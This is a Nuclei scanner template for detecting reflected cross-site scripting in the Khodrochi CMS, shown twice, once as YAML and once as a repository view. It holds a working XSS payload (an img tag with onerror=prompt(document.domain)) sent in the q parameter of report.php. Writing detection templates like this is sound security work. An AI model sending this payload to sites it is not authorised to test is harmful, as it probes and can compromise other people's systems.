nuclei-templates/http/vulnerabilities/other/khodrochi-cms-xss.yaml

id: khodrochi-cms-xss

info:
  name:  Khodrochi CMS - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.
  reference:  
    - https://www.exploitalert.com/view-details.html?id=38723
    - https://cxsecurity.com/ascii/WLB-2022050087
  metadata:
    max-request: 1
    verified: true
  tags: khodrochi,cms,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains(body, "class=\"cons_form") && contains(body, "><img src=x onerror=prompt(document.domain)>")'
        condition: and
templates added 2023-10-17 07:20:28 +00:00			`id: khodrochi-cms-xss`

			`info:`
			`name: Khodrochi CMS - Cross-Site Scripting`
			`author: r3Y3r53`
			`severity: medium`
			`description: \|`
			`A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.`
			`reference:`
			`- https://www.exploitalert.com/view-details.html?id=38723`
			`- https://cxsecurity.com/ascii/WLB-2022050087`
			`metadata:`
			`max-request: 1`
			`verified: true`
			`tags: khodrochi,cms,xss`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E"`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains(header, "text/html")'`
			`- 'contains(body, "class=\"cons_form") && contains(body, "><img src=x onerror=prompt(document.domain)>")'`
			`condition: and`